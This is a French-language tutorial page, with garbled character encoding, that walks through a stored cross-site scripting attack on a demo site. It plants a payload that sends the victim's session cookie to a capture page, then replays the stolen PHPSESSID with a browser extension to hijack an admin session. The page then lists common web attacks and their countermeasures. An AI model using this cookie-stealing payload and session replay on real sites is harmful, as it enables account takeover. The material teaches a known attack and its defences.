Comment pirater un site web ? Techniques de piratage de sites web
โก Rรฉsumรฉ intelligent
Le piratage de sites web exploite les failles des applications web (code mal รฉcrit, entrรฉes non filtrรฉes et gestion des sessions dรฉfaillante) pour obtenir un accรจs non autorisรฉ. Cette page prรฉsente les techniques d'attaque courantes et, surtout, les contre-mesures permettant de sรฉcuriser un site web.

Plus de personnes que jamais ont accรจs ร Internet. Cela a incitรฉ de nombreuses organisations ร dรฉvelopper des applications Web que les utilisateurs peuvent utiliser en ligne pour interagir avec l'organisation. Un code mal รฉcrit pour les applications Web peut รชtre exploitรฉ pour obtenir un accรจs non autorisรฉ ร des donnรฉes sensibles et ร des serveurs Web.
Vous apprendrez les techniques courantes de piratage de sites web et les contre-mesures permettant de se protรฉger contre de telles attaques.
Comment pirater un site Web
Dans ce scรฉnario pratique de piratage de site Web, nous allons dรฉtourner la session utilisateur de l'application Web situรฉe ร l'adresse www.techpanda.orgNous utiliserons une technique de script intersite pour lire l'identifiant de session du cookie, puis nous l'utiliserons pour usurper l'identitรฉ d'une session utilisateur lรฉgitime.
On part du principe que l'attaquant a accรจs ร l'application web et souhaite dรฉtourner les sessions d'autres utilisateurs. L'objectif de cette attaque pourrait รชtre d'obtenir un accรจs administrateur ร l'application, en supposant que le compte de l'attaquant dispose de droits d'accรจs limitรฉs.
รtape 1) Ouvrez URL http://www.techpanda.org/.
ร des fins pratiques, il est fortement recommandรฉ d'obtenir un accรจs via une injection SQL. Voir : Cet article traite de l'injection SQL. pour plus d'informations sur la faรงon de procรฉder.
รtape 2) Saisissez vos identifiants de connexion.
L'adresse e-mail de connexion est admin@google.com et le mot de passe est Password2010.
รtape 3) Consultez le tableau de bord.
Si vous vous รชtes connectรฉ avec succรจs, vous obtiendrez le tableau de bord suivant.
รtape 4) Saisir un nouveau contenu.
Cliquez sur Ajouter un nouveau contact et saisissez les informations suivantes comme prรฉnom :
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
รtape 5) Ajouter JavaScรฉnario.
Le code ci-dessus utilise JavaScript. Il ajoute un lien hypertexte avec un รฉvรฉnement onclick. Lorsque l'utilisateur, sans s'en douter, clique sur le lien, l'รฉvรฉnement rรฉcupรจre le ID de session du cookie PHP et l'envoie ร la page snatch_sess_id.php avec l'identifiant de session dans le URL.
รtape 6) Ajouter des dรฉtails.
Saisissez les informations restantes comme indiquรฉ ci-dessous et cliquez sur Enregistrer les modifications.
รtape 7) Consultez le tableau de bord.
Votre tableau de bord ressemblera dรฉsormais ร l'รฉcran suivant.
รtape 8) Vรฉrifier l'identifiant de session.
Le script intersite รฉtant stockรฉ dans la base de donnรฉes, il se charge ร chaque connexion d'un utilisateur disposant des droits d'accรจs. Lorsque l'administrateur se connecte et clique sur le lien ยซ Dark ยป, une fenรชtre affichant l'identifiant de session apparaรฎt. URL.
Remarque : le script pourrait envoyer la valeur ร un serveur distant oรน est stockรฉ le PHPSESSID, puis rediriger lโutilisateur comme si de rien nโรฉtait.
Remarque : la valeur que vous obtenez peut รชtre diffรฉrente de celle affichรฉe ici, mais le concept reste le mรชme.
Usurpation d'identitรฉ de session ร l'aide Firefox et module complรฉmentaire Tamper Data
Remarque : lโextension classique Tamper Data prรฉsentรฉe ci-dessous ne sโinstalle plus sur les systรจmes actuels. Firefoxmais le concept qu'il illustre โ intercepter et modifier une requรชte HTTP pour rejouer une session capturรฉe โ reste inchangรฉ.
L'organigramme ci-dessous montre les รฉtapes que vous devez suivre pour rรฉaliser cet exercice.
- Vous aurez besoin du Firefox Navigateur Web pour cette section et module complรฉmentaire Tamper Data.
- Ouvrez Firefox et installez le module complรฉmentaire comme indiquรฉ dans les schรฉmas ci-dessous.
- Recherchez les donnรฉes de falsification, puis cliquez sur installer comme indiquรฉ ci-dessus.
- Cliquez sur Accepter et installerโฆ
- Cliquez sur ยซ Redรฉmarrer maintenant ยป une fois l'installation terminรฉe.
- Activer la barre de menu dans Firefox si ce n'est pas affichรฉ.
- Cliquez sur le menu Outils, puis sรฉlectionnez Altรฉration des donnรฉes comme indiquรฉ ci-dessous.
- La fenรชtre suivante s'affichera. Remarque : si la fenรชtre n'est pas vide, cliquez sur le bouton ยซ Effacer ยป.
- Cliquez sur le menu Dรฉmarrer le Tamper.
- Revenez ร la Firefox Dans votre navigateur web, saisissez http://www.techpanda.org/dashboard.php, puis appuyez sur la touche Entrรฉe pour charger la page.
- Vous recevrez la fenรชtre contextuelle suivante de Tamper Data.
- La fenรชtre contextuelle propose trois (3) options. L'option ยซ Modifier ยป permet de modifier les informations d'en-tรชte HTTP avant leur envoi au serveur.
- Clique dessus.
- Vous obtiendrez la fenรชtre suivante.
- Copiez l'identifiant de session PHP que vous avez copiรฉ lors de l'attaque. URL Collez-le aprรจs le signe รฉgal. Votre valeur devrait maintenant ressembler ร ceci.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Cliquez sur le bouton OK.
- La fenรชtre contextuelle ยซ Donnรฉes altรฉrรฉes ยป s'affichera ร nouveau.
- Dรฉcochez la case qui demande Continuer la falsification ?
- Cliquez sur le bouton ยซ Soumettre ยป une fois terminรฉ.
- Vous devriez voir le tableau de bord comme indiquรฉ ci-dessous.
Remarque : nous ne nous sommes pas connectรฉs ; nous avons usurpรฉ une session de connexion en utilisant la valeur PHPSESSID que nous avons rรฉcupรฉrรฉe ร l'aide d'un script intersite.
Qu'est-ce qu'une application Web ? Que sont les menaces Web ?
Une application web (ou site web) est une application basรฉe sur le modรจle client-serveur. Le serveur assure l'accรจs ร la base de donnรฉes et la logique mรฉtier. Il est hรฉbergรฉ sur un serveur web. L'application cliente s'exรฉcute dans le navigateur web du client. Les applications web sont gรฉnรฉralement รฉcrites dans des langages tels queโฆ Java, C#, VB.Net, PHPet le langage de balisage ColdFusion, etc. Les moteurs de bases de donnรฉes utilisรฉs dans les applications Web comprennent MySQL, MS SQL Server, PostgreSQL, SQLite, etc.
Principales techniques de piratage de sites Web
La plupart des applications web sont hรฉbergรฉes sur des serveurs publics. serveurs Accessibles via Internet, ces applications web sont vulnรฉrables aux attaques du fait de leur facilitรฉ d'accรจs. Voici quelques menaces courantes qui pรจsent sur les applications web.
- Injection SQL โ le but de cette menace pourrait รชtre de contourner les algorithmes de connexion, de saboter les donnรฉes, etc.
- Dรฉni de service Attaques โ lโobjectif de cette menace pourrait รชtre dโempรชcher les utilisateurs lรฉgitimes dโaccรฉder ร la ressource.
- XSS (Cross-Site Scripting) โ Lโobjectif de cette menace pourrait รชtre dโinjecter du code exรฉcutable cรดtรฉ client, cรดtรฉ navigateur.
- Empoisonnement des cookies/sessions โ le but de cette menace est de modifier les cookies/donnรฉes de session par un attaquant pour obtenir un accรจs non autorisรฉ.
- Falsification de formulaire โ le but de cette menace est de modifier les donnรฉes des formulaires telles que les prix dans les applications de commerce รฉlectronique afin que l'attaquant puisse obtenir des articles ร prix rรฉduits.
- Code Injection โ le but de cette menace est d'injecter du code tel que PHP, Python, etc. qui peuvent รชtre exรฉcutรฉs sur le serveur. Le code peut installer des portes dรฉrobรฉes, rรฉvรฉler des informations sensibles, etc.
- Defacement โ Lโobjectif de cette menace est de modifier la page affichรฉe sur un site web et de rediriger toutes les requรชtes de pages vers une seule page contenant le message de lโattaquant.
Comment protรฉger votre site Web contre les piratages ?
Une organisation peut adopter la stratรฉgie suivante pour se protรฉger contre les attaques de serveur Web.
- Injection SQL โ Le nettoyage et la validation des paramรจtres utilisateur avant leur soumission ร la base de donnรฉes pour traitement peuvent contribuer ร rรฉduire les risques d'attaque par injection SQL. Les moteurs de bases de donnรฉes tels que MS SQL Server, MySQL, etc. prennent en charge les paramรจtres et les requรชtes prรฉparรฉes. Elles sont beaucoup plus sรปres que les requรชtes SQL traditionnelles.
- Attaques de dรฉni de service Les pare-feu peuvent bloquer le trafic provenant d'adresses IP suspectes en cas d'attaque par dรฉni de service (DoS). Une configuration rรฉseau adรฉquate et un systรจme de dรฉtection d'intrusion contribuent รฉgalement ร rรฉduire les risques de rรฉussite d'une telle attaque.
- Script intersite โ validation et nettoyage des en-tรชtes et des paramรจtres transmis via URLLes paramรจtres de formulaire et les valeurs cachรฉes peuvent contribuer ร rรฉduire les attaques XSS.
- Empoisonnement des cookies/sessions โ cela peut รชtre รฉvitรฉ en chiffrant le contenu des cookies, en les faisant expirer aprรจs un certain temps et en associant les cookies ร l'adresse IP du client qui a รฉtรฉ utilisรฉe pour les crรฉer.
- Falsification de formulaire โ cela peut รชtre รฉvitรฉ en validant et en vรฉrifiant les donnรฉes saisies par l'utilisateur avant de les traiter.
- Code Injection On peut รฉviter ce problรจme en traitant tous les paramรจtres comme des donnรฉes et non comme du code exรฉcutable. La validation et l'assainissement des donnรฉes permettent d'y parvenir.
- Defacement โ un bon sรฉcuritรฉ des applications Web La politique de sรฉcuritรฉ doit garantir la correction des vulnรฉrabilitรฉs couramment exploitรฉes pour accรฉder au serveur web. Cela implique une configuration adรฉquate du systรจme d'exploitation, du logiciel serveur web et l'application des meilleures pratiques de sรฉcuritรฉ lors du dรฉveloppement.ping des applications Web.
Vรฉrifie รงa: 9 Meilleur URL Scanners pour vรฉrifier si un lien est sรปr face aux logiciels malveillants


















